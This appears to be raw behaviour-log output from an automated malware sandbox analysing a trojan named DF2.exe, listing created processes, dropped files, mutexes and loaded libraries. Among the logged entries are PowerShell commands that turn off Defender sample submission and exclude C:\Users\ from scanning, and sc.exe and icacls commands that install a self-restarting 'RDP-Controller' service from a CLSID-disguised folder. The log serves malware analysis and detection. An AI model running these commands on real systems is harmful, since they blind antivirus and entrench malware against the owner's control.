Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF76A9099E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0EB41292 appears 515 times
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: String function: 00007FF764CC14E2 appears 295 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100

Source: termsrv32.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: 5P46VR1V.21.dr	Static PE information: Number of sections : 11 > 10
Source: samctl.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: LcUJSdZq.21.dr	Static PE information: Number of sections : 11 > 10
Source: DF2.exe	Static PE information: Number of sections : 11 > 10
Source: YERHbDgw.21.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: evtsrv.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: DiEI7oU1.21.dr	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: bT51Gn7Q.21.dr	Static PE information: Number of sections : 11 > 10
Source: DkzUMxZ8.21.dr	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.21.dr	Static PE information: Number of sections : 11 > 10
Source: 6KasAPG0.21.dr	Static PE information: Number of sections : 11 > 10
Source: yGODxgsj.21.dr	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.21.dr	Static PE information: Number of sections : 11 > 10

Source: DF2.exe, 00000000.00000002.1655842476.0000000002A3D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs DF2.exe
Source: DF2.exe, 00000000.00000000.1653343153.0000000000B46000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIntegrator.exe@ vs DF2.exe
Source: DF2.exe, 00000001.00000002.2911163955.00000000028CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs DF2.exe
Source: DF2.exe	Binary or memory string: OriginalFilenameIntegrator.exe@ vs DF2.exe

Source: classification engine

Classification label: mal100.troj.evad.winEXE@45/74@2/59

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CC855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,

5_2_00007FF764CC855D

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CC1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

5_2_00007FF764CC1A19

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 21_2_00007FF76A908C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

21_2_00007FF76A908C4A

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 21_2_00007FF76A908C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

21_2_00007FF76A908C4A

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess7100
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03

Source: C:\Users\user\Desktop\DF2.exe

File created: C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat

Jump to behavior

Source: C:\Users\user\Desktop\DF2.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"

Source: DF2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

File read: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: C:\Users\user\Desktop\DF2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: DF2.exe	String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: DF2.exe	String found in binary or memory: application/vnd.groove-help
Source: DF2.exe	String found in binary or memory: "application/x-install-instructions

Source: unknown	Process created: C:\Users\user\Desktop\DF2.exe "C:\Users\user\Desktop\DF2.exe"
Source: unknown	Process created: C:\Users\user\Desktop\DF2.exe C:\Users\user\Desktop\DF2.exe
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe "C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe"
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Users\user\Desktop\DF2.exe C:\Users\user\Desktop\DF2.exe	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe "C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Process created: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DF2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
